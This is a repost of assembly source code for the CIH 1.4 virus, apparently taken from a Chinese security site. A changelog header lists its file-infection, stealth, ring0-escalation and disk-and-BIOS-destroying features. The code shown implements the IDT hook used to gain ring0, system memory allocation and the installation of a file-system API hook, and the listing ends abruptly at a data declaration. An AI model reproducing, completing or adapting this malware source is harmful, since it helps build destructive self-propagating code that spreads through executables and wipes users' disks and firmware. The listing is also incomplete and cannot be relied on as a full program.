CIH 1.4 source code
Source: Hacker Defense (黑客防线)
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
.586P
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?